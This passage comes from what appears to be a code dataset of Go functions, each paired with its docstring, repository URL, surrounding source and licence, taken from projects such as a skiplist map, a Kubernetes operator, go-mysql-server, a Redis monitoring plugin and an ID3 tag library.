return *(*interface{})(atomic.LoadPointer(&n.value))
}
func (n *int64Node) loadNext(i int) *int64Node {
return (*int64Node)(n.next.load(i))
}
func (n *int64Node) storeNext(i int, node *int64Node) {
n.next.store(i, unsafe.Pointer(node))
}
func (n *int64Node) atomicLoadNext(i int) *int64Node {
return (*int64Node)(n.next.atomicLoad(i))
}
func (n *int64Node) atomicStoreNext(i int, node *int64Node) {
n.next.atomicStore(i, unsafe.Pointer(node))
}
func (n *int64Node) lessthan(key int64) bool {
return n.key < key
}
func (n *int64Node) equal(key int64) bool {
return n.key == key
}
func NewInt64() *Int64Map {
h := newInt64Node(0, "", maxLevel)
h.flags.SetTrue(fullyLinked)
return &Int64Map{
header: h,
highestLevel: defaultHighestLevel,
}
}
func (s *Int64Map) findNode(key int64, preds *[maxLevel]*int64Node, succs *[maxLevel]*int64Node) *int64Node {
x := s.header
for i := int(atomic.LoadInt64(&s.highestLevel)) - 1; i >= 0; i-- {
succ := x.atomicLoadNext(i)
for succ != nil && succ.lessthan(key) {
x = succ
succ = x.atomicLoadNext(i)
}
preds[i] = x
succs[i] = succ
if succ != nil && succ.equal(key) {
return succ
}
}
return nil
} | Apache License 2.0 |
cv/sd | cli/parsing.go | exampleFrom | go | func exampleFrom(path string) (string, error) {
file, err := os.Open(path)
if err != nil {
return "", err
}
defer func() {
err = file.Close()
if err != nil {
logrus.Error(err)
}
}()
r := regexp.MustCompile(`^# example: (.*)$`)
scanner := bufio.NewScanner(file)
for scanner.Scan() {
match := r.FindStringSubmatch(scanner.Text())
if len(match) == 2 {
logrus.Debug("Found example line: ", filepath.Join(path), ", set to: ", match[1])
return fmt.Sprintf(" %s", match[1]), nil
}
}
return "", nil
} | /*
Looks for a line like this:
# example: foo bar 1 2 3 | https://github.com/cv/sd/blob/26e084b6c5a13829747ffe298968b33f8a660e6b/cli/parsing.go#L112-L134 | package cli
import (
"bufio"
"fmt"
"os"
"path/filepath"
"regexp"
"strings"
"github.com/Sirupsen/logrus"
"github.com/spf13/cobra"
)
func shortDescriptionFrom(path string) (string, error) {
file, err := os.Open(path)
if err != nil {
return "", err
}
defer func() {
err = file.Close()
if err != nil {
logrus.Error(err)
}
}()
r := regexp.MustCompile(fmt.Sprintf(`^# %s: (.*)$`, regexp.QuoteMeta(filepath.Base(path))))
scanner := bufio.NewScanner(file)
for scanner.Scan() {
match := r.FindStringSubmatch(scanner.Text())
if len(match) == 2 {
logrus.Debug("Found short description line: ", filepath.Join(path), ", set to: ", match[1])
return match[1], nil
}
}
return "", nil
}
func usageFrom(path string) (string, cobra.PositionalArgs, error) {
file, err := os.Open(path)
if err != nil {
return "", cobra.ArbitraryArgs, err
}
defer func() {
err = file.Close()
if err != nil {
logrus.Error(err)
}
}()
r := regexp.MustCompile(`^# usage: (.*)$`)
scanner := bufio.NewScanner(file)
for scanner.Scan() {
match := r.FindStringSubmatch(scanner.Text())
if len(match) == 2 {
line := match[1]
logrus.Debug("Found usage line: ", filepath.Join(path), ", set to: ", line)
parts := strings.Split(line, " ")
if len(parts) == 1 {
logrus.Debug("No args allowed")
return line, cobra.NoArgs, nil
}
var required, optional int
for _, i := range parts[1:] {
if i == "..." {
continue
}
if strings.HasPrefix(i, "[") && strings.HasSuffix(i, "]") {
logrus.Debug("Found optional arg: ", i)
optional++
} else {
logrus.Debug("Found required arg: ", i)
required++
}
}
if parts[len(parts)-1] == "..." {
logrus.Debug("Minimum of ", required, " arguments set")
return match[1], cobra.MinimumNArgs(required), nil
}
logrus.Debug("Arg range of ", required, " and ", required+optional, " set")
return match[1], cobra.RangeArgs(required, required+optional), nil
}
}
logrus.Debug("Any args allowed")
return filepath.Base(path), cobra.ArbitraryArgs, nil
} | MIT License |
tikv/tikv-operator | pkg/util/discovery/discovery.go | IsAPIGroupSupported | go | func IsAPIGroupSupported(discoveryCli discovery.DiscoveryInterface, group string) (bool, error) {
apiGroupList, err := discoveryCli.ServerGroups()
if err != nil {
return false, err
}
for _, apiGroup := range apiGroupList.Groups {
if apiGroup.Name == group {
return true, nil
}
}
return false, nil
} | IsAPIGroupSupported checks if given group is supported by the cluster. | https://github.com/tikv/tikv-operator/blob/c29847e78c7986f6d4ad6899319a857a1ea35c86/pkg/util/discovery/discovery.go#L45-L56 | package discovery
import (
"k8s.io/apimachinery/pkg/runtime/schema"
"k8s.io/client-go/discovery"
)
func IsAPIGroupVersionSupported(discoveryCli discovery.DiscoveryInterface, groupVersion string) (bool, error) {
gv, err := schema.ParseGroupVersion(groupVersion)
if err != nil {
return false, err
}
apiGroupList, err := discoveryCli.ServerGroups()
if err != nil {
return false, err
}
for _, apiGroup := range apiGroupList.Groups {
if apiGroup.Name != gv.Group {
continue
}
for _, version := range apiGroup.Versions {
if version.GroupVersion == gv.String() {
return true, nil
}
}
}
return false, nil
} | Apache License 2.0 |
src-d/go-mysql-server | sql/plan/insert.go | NewInsertInto | go | func NewInsertInto(dst, src sql.Node, isReplace bool, cols []string) *InsertInto {
return &InsertInto{
BinaryNode: BinaryNode{Left: dst, Right: src},
Columns: cols,
IsReplace: isReplace,
}
} | NewInsertInto creates an InsertInto node. | https://github.com/src-d/go-mysql-server/blob/015a39c0e2216bb0dcd98b808c86239693e05a91/sql/plan/insert.go#L29-L35 | package plan
import (
"github.com/src-d/go-mysql-server/sql"
"github.com/src-d/go-mysql-server/sql/expression"
"gopkg.in/src-d/go-errors.v1"
"io"
"strings"
)
var ErrInsertIntoNotSupported = errors.NewKind("table doesn't support INSERT INTO")
var ErrReplaceIntoNotSupported = errors.NewKind("table doesn't support REPLACE INTO")
var ErrInsertIntoMismatchValueCount = errors.NewKind("number of values does not match number of columns provided")
var ErrInsertIntoUnsupportedValues = errors.NewKind("%T is unsupported for inserts")
var ErrInsertIntoDuplicateColumn = errors.NewKind("duplicate column name %v")
var ErrInsertIntoNonexistentColumn = errors.NewKind("invalid column name %v")
var ErrInsertIntoNonNullableDefaultNullColumn = errors.NewKind("column name '%v' is non-nullable but attempted to set default value of null")
var ErrInsertIntoNonNullableProvidedNull = errors.NewKind("column name '%v' is non-nullable but attempted to set a value of null")
type InsertInto struct {
BinaryNode
Columns []string
IsReplace bool
} | Apache License 2.0 |
azure/k8s-infra | hack/generator/pkg/astmodel/object_type.go | WithFunction | go | func (objectType *ObjectType) WithFunction(function Function) *ObjectType {
result := objectType.copy()
result.functions[function.Name()] = function
return result
} | WithFunction creates a new ObjectType with a function (method) attached to it | https://github.com/azure/k8s-infra/blob/b66072047937301e919c4332d7cdd4493739718f/hack/generator/pkg/astmodel/object_type.go#L457-L463 | package astmodel
import (
"go/token"
"sort"
"strings"
"github.com/Azure/k8s-infra/hack/generator/pkg/astbuilder"
"github.com/dave/dst"
"github.com/pkg/errors"
)
type ObjectType struct {
embedded map[TypeName]*PropertyDefinition
properties map[PropertyName]*PropertyDefinition
functions map[string]Function
testcases map[string]TestCase
InterfaceImplementer
}
var EmptyObjectType = NewObjectType()
var _ Type = &ObjectType{}
var _ PropertyContainer = &ObjectType{}
var _ FunctionContainer = &ObjectType{}
func NewObjectType() *ObjectType {
return &ObjectType{
embedded: make(map[TypeName]*PropertyDefinition),
properties: make(map[PropertyName]*PropertyDefinition),
functions: make(map[string]Function),
testcases: make(map[string]TestCase),
InterfaceImplementer: MakeInterfaceImplementer(),
}
}
func (objectType *ObjectType) AsDeclarations(codeGenerationContext *CodeGenerationContext, declContext DeclarationContext) []dst.Decl {
declaration := &dst.GenDecl{
Decs: dst.GenDeclDecorations{
NodeDecs: dst.NodeDecs{
Before: dst.EmptyLine,
After: dst.EmptyLine,
},
},
Tok: token.TYPE,
Specs: []dst.Spec{
&dst.TypeSpec{
Name: dst.NewIdent(declContext.Name.Name()),
Type: objectType.AsType(codeGenerationContext),
},
},
}
astbuilder.AddWrappedComments(&declaration.Decs.Start, declContext.Description, 200)
AddValidationComments(&declaration.Decs.Start, declContext.Validations)
result := []dst.Decl{declaration}
result = append(result, objectType.InterfaceImplementer.AsDeclarations(codeGenerationContext, declContext.Name, nil)...)
result = append(result, objectType.generateMethodDecls(codeGenerationContext, declContext.Name)...)
return result
}
func (objectType *ObjectType) generateMethodDecls(codeGenerationContext *CodeGenerationContext, typeName TypeName) []dst.Decl {
var result []dst.Decl
for _, f := range objectType.Functions() {
funcDef := f.AsFunc(codeGenerationContext, typeName)
result = append(result, funcDef)
}
return result
}
func defineField(fieldName string, fieldType dst.Expr, tag string) *dst.Field {
result := &dst.Field{
Type: fieldType,
Tag: astbuilder.TextLiteral(tag),
}
if fieldName != "" {
result.Names = []*dst.Ident{dst.NewIdent(fieldName)}
}
return result
}
func (objectType *ObjectType) Properties() []*PropertyDefinition {
var result []*PropertyDefinition
for _, property := range objectType.properties {
result = append(result, property)
}
sort.Slice(result, func(left int, right int) bool {
return result[left].propertyName < result[right].propertyName
})
return result
}
func (objectType *ObjectType) Property(name PropertyName) (*PropertyDefinition, bool) {
prop, ok := objectType.properties[name]
return prop, ok
}
func (objectType *ObjectType) EmbeddedProperties() []*PropertyDefinition {
var result []*PropertyDefinition
for _, embedded := range objectType.embedded {
result = append(result, embedded)
}
sort.Slice(result, func(left int, right int) bool {
lTypeName, err := extractEmbeddedTypeName(result[left].PropertyType())
if err != nil {
panic(err)
}
rTypeName, err := extractEmbeddedTypeName(result[right].PropertyType())
if err != nil {
panic(err)
}
return lTypeName.Name() < rTypeName.Name()
})
return result
}
func (objectType *ObjectType) Functions() []Function {
var functions []Function
for _, f := range objectType.functions {
functions = append(functions, f)
}
sort.Slice(functions, func(i int, j int) bool {
return functions[i].Name() < functions[j].Name()
})
return functions
}
func (objectType *ObjectType) HasFunctionWithName(name string) bool {
_, ok := objectType.functions[name]
return ok
}
func (objectType *ObjectType) AsType(codeGenerationContext *CodeGenerationContext) dst.Expr {
var fields []*dst.Field
for _, f := range objectType.EmbeddedProperties() {
fields = append(fields, f.AsField(codeGenerationContext))
}
for _, f := range objectType.Properties() {
fields = append(fields, f.AsField(codeGenerationContext))
}
if len(fields) > 0 {
fields[0].Decs.Before = dst.NewLine
}
return &dst.StructType{
Fields: &dst.FieldList{
List: fields,
},
}
}
func (objectType *ObjectType) AsZero(_ Types, _ *CodeGenerationContext) dst.Expr {
panic("cannot create a zero value for an object type")
}
func (objectType *ObjectType) RequiredPackageReferences() *PackageReferenceSet {
result := NewPackageReferenceSet()
for _, property := range objectType.embedded {
propertyType := property.PropertyType()
result.Merge(propertyType.RequiredPackageReferences())
}
for _, property := range objectType.properties {
propertyType := property.PropertyType()
result.Merge(propertyType.RequiredPackageReferences())
}
for _, function := range objectType.functions {
result.Merge(function.RequiredPackageReferences())
}
result.Merge(objectType.InterfaceImplementer.RequiredPackageReferences())
return result
}
func (objectType *ObjectType) References() TypeNameSet {
results := NewTypeNameSet()
for _, property := range objectType.properties {
results = results.AddAll(property.PropertyType().References())
}
for _, property := range objectType.embedded {
results = results.AddAll(property.PropertyType().References())
}
return results
}
func (objectType *ObjectType) Equals(t Type) bool {
if objectType == t {
return true
}
other, ok := t.(*ObjectType)
if !ok {
return false
}
if len(objectType.embedded) != len(other.embedded) {
return false
}
for n, f := range other.embedded {
ourProperty, ok := objectType.embedded[n]
if !ok {
return false
}
if !ourProperty.Equals(f) {
return false
}
}
if len(objectType.properties) != len(other.properties) {
return false
}
for n, f := range other.properties {
ourProperty, ok := objectType.properties[n]
if !ok {
return false
}
if !ourProperty.Equals(f) {
return false
}
}
if len(objectType.functions) != len(other.functions) {
return false
}
for name, function := range other.functions {
ourFunction, ok := objectType.functions[name]
if !ok {
return false
}
if !ourFunction.Equals(function) {
return false
}
}
if len(objectType.testcases) != len(other.testcases) {
return false
}
for name, testcase := range other.testcases {
ourCase, ok := objectType.testcases[name]
if !ok {
return false
}
if !ourCase.Equals(testcase) {
return false
}
}
if len(objectType.testcases) != len(other.testcases) {
return false
}
for name, testcase := range other.testcases {
ourCase, ok := objectType.testcases[name]
if !ok {
return false
}
if !ourCase.Equals(testcase) {
return false
}
}
return objectType.InterfaceImplementer.Equals(other.InterfaceImplementer)
}
func (objectType *ObjectType) WithProperty(property *PropertyDefinition) *ObjectType {
result := objectType.copy()
result.properties[property.propertyName] = property
return result
}
func (objectType *ObjectType) WithProperties(properties ...*PropertyDefinition) *ObjectType {
result := objectType.copy()
for _, f := range properties {
result.properties[f.propertyName] = f
}
return result
}
func (objectType *ObjectType) WithEmbeddedProperties(properties ...*PropertyDefinition) (*ObjectType, error) {
result := objectType.copy()
for _, p := range properties {
err := objectType.checkEmbeddedProperty(p)
if err != nil {
return objectType, err
}
typeName, err := extractEmbeddedTypeName(p.PropertyType())
if err != nil {
return objectType, err
}
result.embedded[typeName] = p
}
return result, nil
}
func (objectType *ObjectType) WithoutProperties() *ObjectType {
result := objectType.copy()
result.properties = make(map[PropertyName]*PropertyDefinition)
return result
}
func (objectType *ObjectType) WithoutProperty(name PropertyName) *ObjectType {
result := objectType.copy()
delete(result.properties, name)
return result
}
func (objectType *ObjectType) WithoutEmbeddedProperty(name TypeName) *ObjectType {
result := objectType.copy()
delete(result.embedded, name)
return result
}
func (objectType *ObjectType) WithoutEmbeddedProperties() *ObjectType {
result := objectType.copy()
result.embedded = make(map[TypeName]*PropertyDefinition)
return result
}
func (objectType *ObjectType) checkEmbeddedProperty(property *PropertyDefinition) error {
if property.PropertyName() != "" {
return errors.Errorf("embedded property name must be empty, was: %s", property.PropertyName())
}
return nil
}
func (objectType *ObjectType) WithEmbeddedProperty(property *PropertyDefinition) (*ObjectType, error) {
err := objectType.checkEmbeddedProperty(property)
if err != nil {
return objectType, err
}
typeName, err := extractEmbeddedTypeName(property.PropertyType())
if err != nil {
return objectType, err
}
result := objectType.copy()
result.embedded[typeName] = property
return result, nil
} | MIT License |
dappledger/annchain | eth/core/rawdb/accessors_chain.go | ReadBody | go | func ReadBody(db DatabaseReader, hash common.Hash, number uint64) *types.Body {
data := ReadBodyRLP(db, hash, number)
if len(data) == 0 {
return nil
}
body := new(types.Body)
if err := rlp.Decode(bytes.NewReader(data), body); err != nil {
log.Error("Invalid block body RLP", "hash", hash, "err", err)
return nil
}
return body
} | ReadBody retrieves the block body corresponding to the hash. | https://github.com/dappledger/annchain/blob/916cc142c344937c01c5459270a64cb133f95c08/eth/core/rawdb/accessors_chain.go#L213-L224 | package rawdb
import (
"bytes"
"encoding/binary"
"math/big"
"github.com/dappledger/AnnChain/eth/common"
"github.com/dappledger/AnnChain/eth/core/types"
"github.com/dappledger/AnnChain/eth/log"
"github.com/dappledger/AnnChain/eth/rlp"
)
func ReadCanonicalHash(db DatabaseReader, number uint64) common.Hash {
data, _ := db.Get(headerHashKey(number))
if len(data) == 0 {
return common.Hash{}
}
return common.BytesToHash(data)
}
func WriteCanonicalHash(db DatabaseWriter, hash common.Hash, number uint64) {
if err := db.Put(headerHashKey(number), hash.Bytes()); err != nil {
log.Crit("Failed to store number to hash mapping", "err", err)
}
}
func DeleteCanonicalHash(db DatabaseDeleter, number uint64) {
if err := db.Delete(headerHashKey(number)); err != nil {
log.Crit("Failed to delete number to hash mapping", "err", err)
}
}
func ReadHeaderNumber(db DatabaseReader, hash common.Hash) *uint64 {
data, _ := db.Get(headerNumberKey(hash))
if len(data) != 8 {
return nil
}
number := binary.BigEndian.Uint64(data)
return &number
}
func ReadHeadHeaderHash(db DatabaseReader) common.Hash {
data, _ := db.Get(headHeaderKey)
if len(data) == 0 {
return common.Hash{}
}
return common.BytesToHash(data)
}
func WriteHeadHeaderHash(db DatabaseWriter, hash common.Hash) {
if err := db.Put(headHeaderKey, hash.Bytes()); err != nil {
log.Crit("Failed to store last header's hash", "err", err)
}
}
func ReadHeadBlockHash(db DatabaseReader) common.Hash {
data, _ := db.Get(headBlockKey)
if len(data) == 0 {
return common.Hash{}
}
return common.BytesToHash(data)
}
func WriteHeadBlockHash(db DatabaseWriter, hash common.Hash) {
if err := db.Put(headBlockKey, hash.Bytes()); err != nil {
log.Crit("Failed to store last block's hash", "err", err)
}
}
func ReadHeadFastBlockHash(db DatabaseReader) common.Hash {
data, _ := db.Get(headFastBlockKey)
if len(data) == 0 {
return common.Hash{}
}
return common.BytesToHash(data)
}
func WriteHeadFastBlockHash(db DatabaseWriter, hash common.Hash) {
if err := db.Put(headFastBlockKey, hash.Bytes()); err != nil {
log.Crit("Failed to store last fast block's hash", "err", err)
}
}
func ReadFastTrieProgress(db DatabaseReader) uint64 {
data, _ := db.Get(fastTrieProgressKey)
if len(data) == 0 {
return 0
}
return new(big.Int).SetBytes(data).Uint64()
}
func WriteFastTrieProgress(db DatabaseWriter, count uint64) {
if err := db.Put(fastTrieProgressKey, new(big.Int).SetUint64(count).Bytes()); err != nil {
log.Crit("Failed to store fast sync trie progress", "err", err)
}
}
func ReadHeaderRLP(db DatabaseReader, hash common.Hash, number uint64) rlp.RawValue {
data, _ := db.Get(headerKey(number, hash))
return data
}
func HasHeader(db DatabaseReader, hash common.Hash, number uint64) bool {
if has, err := db.Has(headerKey(number, hash)); !has || err != nil {
return false
}
return true
}
func ReadHeader(db DatabaseReader, hash common.Hash, number uint64) *types.Header {
data := ReadHeaderRLP(db, hash, number)
if len(data) == 0 {
return nil
}
header := new(types.Header)
if err := rlp.Decode(bytes.NewReader(data), header); err != nil {
log.Error("Invalid block header RLP", "hash", hash, "err", err)
return nil
}
return header
}
func WriteHeader(db DatabaseWriter, header *types.Header) {
var (
hash = header.Hash()
number = header.Number.Uint64()
encoded = encodeBlockNumber(number)
)
key := headerNumberKey(hash)
if err := db.Put(key, encoded); err != nil {
log.Crit("Failed to store hash to number mapping", "err", err)
}
data, err := rlp.EncodeToBytes(header)
if err != nil {
log.Crit("Failed to RLP encode header", "err", err)
}
key = headerKey(number, hash)
if err := db.Put(key, data); err != nil {
log.Crit("Failed to store header", "err", err)
}
}
func DeleteHeader(db DatabaseDeleter, hash common.Hash, number uint64) {
if err := db.Delete(headerKey(number, hash)); err != nil {
log.Crit("Failed to delete header", "err", err)
}
if err := db.Delete(headerNumberKey(hash)); err != nil {
log.Crit("Failed to delete hash to number mapping", "err", err)
}
}
func ReadBodyRLP(db DatabaseReader, hash common.Hash, number uint64) rlp.RawValue {
data, _ := db.Get(blockBodyKey(number, hash))
return data
}
func WriteBodyRLP(db DatabaseWriter, hash common.Hash, number uint64, rlp rlp.RawValue) {
if err := db.Put(blockBodyKey(number, hash), rlp); err != nil {
log.Crit("Failed to store block body", "err", err)
}
}
func HasBody(db DatabaseReader, hash common.Hash, number uint64) bool {
if has, err := db.Has(blockBodyKey(number, hash)); !has || err != nil {
return false
}
return true
} | Apache License 2.0 |
mackerelio/mackerel-agent-plugins | mackerel-plugin-redis/lib/redis.go | GraphDefinition | go | func (m RedisPlugin) GraphDefinition() map[string]mp.Graphs {
labelPrefix := strings.Title(m.Prefix)
var graphdef = map[string]mp.Graphs{
"queries": {
Label: (labelPrefix + " Queries"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "total_commands_processed", Label: "Queries", Diff: true},
},
},
"connections": {
Label: (labelPrefix + " Connections"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "total_connections_received", Label: "Connections", Diff: true, Stacked: true},
{Name: "rejected_connections", Label: "Rejected Connections", Diff: true, Stacked: true},
},
},
"clients": {
Label: (labelPrefix + " Clients"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "connected_clients", Label: "Connected Clients", Diff: false, Stacked: true},
{Name: "blocked_clients", Label: "Blocked Clients", Diff: false, Stacked: true},
{Name: "connected_slaves", Label: "Connected Slaves", Diff: false, Stacked: true},
},
},
"keys": {
Label: (labelPrefix + " Keys"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "keys", Label: "Keys", Diff: false},
{Name: "expires", Label: "Keys with expiration", Diff: false},
{Name: "expired", Label: "Expired Keys", Diff: true},
{Name: "evicted_keys", Label: "Evicted Keys", Diff: true},
},
},
"keyspace": {
Label: (labelPrefix + " Keyspace"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "keyspace_hits", Label: "Keyspace Hits", Diff: true},
{Name: "keyspace_misses", Label: "Keyspace Missed", Diff: true},
},
},
"memory": {
Label: (labelPrefix + " Memory"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "used_memory", Label: "Used Memory", Diff: false},
{Name: "used_memory_rss", Label: "Used Memory RSS", Diff: false},
{Name: "used_memory_peak", Label: "Used Memory Peak", Diff: false},
{Name: "used_memory_lua", Label: "Used Memory Lua engine", Diff: false},
},
},
"capacity": {
Label: (labelPrefix + " Capacity"),
Unit: "percentage",
Metrics: []mp.Metrics{
{Name: "percentage_of_memory", Label: "Percentage of memory", Diff: false},
{Name: "percentage_of_clients", Label: "Percentage of clients", Diff: false},
},
},
"uptime": {
Label: (labelPrefix + " Uptime"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "uptime_in_seconds", Label: "Uptime In Seconds", Diff: false},
},
},
}
network := "tcp"
address := net.JoinHostPort(m.Host, m.Port)
if m.Socket != "" {
network = "unix"
address = m.Socket
}
c, err := redis.Dial(network, address, redis.DialConnectTimeout(time.Duration(m.Timeout)*time.Second))
if err != nil {
logger.Errorf("Failed to connect redis. %s", err)
return nil
}
defer c.Close()
if m.Password != "" {
if err = authenticateByPassword(c, m.Password); err != nil {
return nil
}
}
str, err := redis.String(c.Do("info"))
if err != nil {
logger.Errorf("Failed to run info command. %s", err)
return nil
}
var metricsLag []mp.Metrics
var metricsOffsetDelay []mp.Metrics
for _, line := range strings.Split(str, "\r\n") {
if line == "" {
continue
}
record := strings.SplitN(line, ":", 2)
if len(record) < 2 {
continue
}
key, _ := record[0], record[1]
if re, _ := regexp.MatchString("^slave\\d+", key); re {
metricsLag = append(metricsLag, mp.Metrics{Name: fmt.Sprintf("%s_lag", key), Label: fmt.Sprintf("Replication lag to %s", key), Diff: false})
metricsOffsetDelay = append(metricsOffsetDelay, mp.Metrics{Name: fmt.Sprintf("%s_offset_delay", key), Label: fmt.Sprintf("Offset delay to %s", key), Diff: false})
}
}
if len(metricsLag) > 0 {
graphdef["lag"] = mp.Graphs{
Label: (labelPrefix + " Slave Lag"),
Unit: "seconds",
Metrics: metricsLag,
}
}
if len(metricsOffsetDelay) > 0 {
graphdef["offset_delay"] = mp.Graphs{
Label: (labelPrefix + " Slave Offset Delay"),
Unit: "count",
Metrics: metricsOffsetDelay,
}
}
return graphdef
} | GraphDefinition interface for mackerelplugin | https://github.com/mackerelio/mackerel-agent-plugins/blob/fc5a856e6b341e4a9c508505789b5f2004549760/mackerel-plugin-redis/lib/redis.go#L221-L355 | package mpredis
import (
"flag"
"fmt"
"net"
"os"
"regexp"
"strconv"
"strings"
"time"
"github.com/gomodule/redigo/redis"
mp "github.com/mackerelio/go-mackerel-plugin-helper"
"github.com/mackerelio/golib/logging"
)
var logger = logging.GetLogger("metrics.plugin.redis")
type RedisPlugin struct {
Host string
Port string
Password string
Socket string
Prefix string
Timeout int
Tempfile string
ConfigCommand string
}
func authenticateByPassword(c redis.Conn, password string) error {
if _, err := c.Do("AUTH", password); err != nil {
logger.Errorf("Failed to authenticate. %s", err)
return err
}
return nil
}
func (m RedisPlugin) fetchPercentageOfMemory(c redis.Conn, stat map[string]interface{}) error {
res, err := redis.StringMap(c.Do(m.ConfigCommand, "GET", "maxmemory"))
if err != nil {
logger.Errorf("Failed to run `%s GET maxmemory` command. %s", m.ConfigCommand, err)
return err
}
maxsize, err := strconv.ParseFloat(res["maxmemory"], 64)
if err != nil {
logger.Errorf("Failed to parse maxmemory. %s", err)
return err
}
if maxsize == 0.0 {
stat["percentage_of_memory"] = 0.0
} else {
stat["percentage_of_memory"] = 100.0 * stat["used_memory"].(float64) / maxsize
}
return nil
}
func (m RedisPlugin) fetchPercentageOfClients(c redis.Conn, stat map[string]interface{}) error {
res, err := redis.StringMap(c.Do(m.ConfigCommand, "GET", "maxclients"))
if err != nil {
logger.Errorf("Failed to run `%s GET maxclients` command. %s", m.ConfigCommand, err)
return err
}
maxsize, err := strconv.ParseFloat(res["maxclients"], 64)
if err != nil {
logger.Errorf("Failed to parse maxclients. %s", err)
return err
}
stat["percentage_of_clients"] = 100.0 * stat["connected_clients"].(float64) / maxsize
return nil
}
func (m RedisPlugin) calculateCapacity(c redis.Conn, stat map[string]interface{}) error {
if err := m.fetchPercentageOfMemory(c, stat); err != nil {
return err
}
return m.fetchPercentageOfClients(c, stat)
}
func (m RedisPlugin) MetricKeyPrefix() string {
if m.Prefix == "" {
m.Prefix = "redis"
}
return m.Prefix
}
func (m RedisPlugin) FetchMetrics() (map[string]interface{}, error) {
network := "tcp"
address := net.JoinHostPort(m.Host, m.Port)
if m.Socket != "" {
network = "unix"
address = m.Socket
}
c, err := redis.Dial(network, address, redis.DialConnectTimeout(time.Duration(m.Timeout)*time.Second))
if err != nil {
logger.Errorf("Failed to connect redis. %s", err)
return nil, err
}
defer c.Close()
if m.Password != "" {
if err = authenticateByPassword(c, m.Password); err != nil {
return nil, err
}
}
str, err := redis.String(c.Do("info"))
if err != nil {
logger.Errorf("Failed to run info command. %s", err)
return nil, err
}
stat := make(map[string]interface{})
keysStat := 0.0
expiresStat := 0.0
var slaves []string
for _, line := range strings.Split(str, "\r\n") {
if line == "" {
continue
}
if re, _ := regexp.MatchString("^#", line); re {
continue
}
record := strings.SplitN(line, ":", 2)
if len(record) < 2 {
continue
}
key, value := record[0], record[1]
if re, _ := regexp.MatchString("^slave\\d+", key); re {
slaves = append(slaves, key)
kv := strings.Split(value, ",")
var offset, lag string
if len(kv) == 5 {
_, _, _, offset, lag = kv[0], kv[1], kv[2], kv[3], kv[4]
lagKv := strings.SplitN(lag, "=", 2)
lagFv, err := strconv.ParseFloat(lagKv[1], 64)
if err != nil {
logger.Warningf("Failed to parse slaves. %s", err)
} else {
stat[fmt.Sprintf("%s_lag", key)] = lagFv
}
} else {
_, _, _, offset = kv[0], kv[1], kv[2], kv[3]
}
offsetKv := strings.SplitN(offset, "=", 2)
offsetFv, err := strconv.ParseFloat(offsetKv[1], 64)
if err != nil {
logger.Warningf("Failed to parse slaves. %s", err)
continue
}
stat[fmt.Sprintf("%s_offset_delay", key)] = offsetFv
continue
}
if re, _ := regexp.MatchString("^db", key); re {
kv := strings.SplitN(value, ",", 3)
keys, expires := kv[0], kv[1]
keysKv := strings.SplitN(keys, "=", 2)
keysFv, err := strconv.ParseFloat(keysKv[1], 64)
if err != nil {
logger.Warningf("Failed to parse db keys. %s", err)
} else {
keysStat += keysFv
}
expiresKv := strings.SplitN(expires, "=", 2)
expiresFv, err := strconv.ParseFloat(expiresKv[1], 64)
if err != nil {
logger.Warningf("Failed to parse db expires. %s", err)
} else {
expiresStat += expiresFv
}
continue
}
v, err := strconv.ParseFloat(value, 64)
if err != nil {
continue
}
stat[key] = v
}
stat["keys"] = keysStat
stat["expires"] = expiresStat
if _, ok := stat["expired_keys"]; ok {
stat["expired"] = stat["expired_keys"]
} else {
stat["expired"] = 0.0
}
if m.ConfigCommand != "" {
if err := m.calculateCapacity(c, stat); err != nil {
logger.Infof("Failed to calculate capacity. (The cause may be that AWS Elasticache Redis has no `%s` command.) Skip these metrics. %s", m.ConfigCommand, err)
}
}
for _, slave := range slaves {
stat[fmt.Sprintf("%s_offset_delay", slave)] = stat["master_repl_offset"].(float64) - stat[fmt.Sprintf("%s_offset_delay", slave)].(float64)
}
return stat, nil
} | Apache License 2.0 |
cloudcloud/go-id3 | frames/frame.go | GetBytePercent | go | func GetBytePercent(b []byte, sig uint) int {
div := float64(len(b) * 256 / (9 - int(sig)))
i := float64(GetSize(b, sig))
x := math.Ceil((i / div) * 100)
return int(x)
} | GetBytePercent will fetch an int from a byte as a percentage | https://github.com/cloudcloud/go-id3/blob/5dd963bb16c2d4153607256d4a3262e5d7f7afe6/frames/frame.go#L158-L164 | package frames
import (
"encoding/binary"
"fmt"
"math"
"strconv"
"strings"
"unicode/utf16"
"unicode/utf8"
)
type IFrame interface {
DisplayContent() string
GetExplain() string
GetLength() int
GetName() string
Init(n, d string, s int)
ProcessData(int, []byte) IFrame
}
type FrameFile interface {
Close() error
Read([]byte) (int, error)
Seek(int64, int) (int64, error)
Write([]byte) (int, error)
}
const (
Version2 = 2
Version3 = 3
Version4 = 4
LengthUnicode = 2
LengthStandard = 1
)
type Frame struct {
Name string `json:"name"`
Version int `json:"-" yaml:"-"`
Description string `json:"description"`
Data []byte `json:"-" yaml:"-"`
Cleaned string `json:"cleaned"`
Size int `json:"size"`
Flags int `json:"flags"`
TagPreserve bool `json:"tag_preserve"`
FilePreserve bool `json:"file_preserve"`
ReadOnly bool `json:"read_only"`
Compression bool `json:"compression"`
Encryption bool `json:"encryption"`
Grouping bool `json:"grouping"`
Utf16 bool `json:"utf16"`
}
func GetStr(b []byte) string {
str := string(b)
if !utf8.ValidString(str) {
r := make([]rune, 0, len(str))
for i, v := range str {
if v == utf8.RuneError {
_, size := utf8.DecodeRuneInString(str[i:])
if size == 1 {
continue
}
}
r = append(r, v)
}
str = string(r)
}
return strings.Trim(str, " \t\n\r\x00")
}
func GetUnicodeStr(d []byte) string {
byteOrder := []byte{d[0], d[1]}
var b binary.ByteOrder
d = d[2:]
resp := ""
if len(d) > 1 {
if byteOrder[0] == '\xFF' && byteOrder[1] == '\xFE' {
b = binary.LittleEndian
} else if byteOrder[0] == '\xFE' && byteOrder[1] == '\xFF' {
b = binary.BigEndian
}
str := make([]uint16, 0, len(d)/2)
for i := 0; i < len(d); i += 2 {
str = append(str, b.Uint16(d[i:i+2]))
}
resp = string(utf16.Decode(str))
}
return resp
}
func GetInt(b []byte) int {
s, _ := strconv.Atoi(GetStr(b))
return s
}
func GetBitInt(b byte, ltr bool, l int) int {
r := 0
if !ltr {
for a := 0; a < l; a++ {
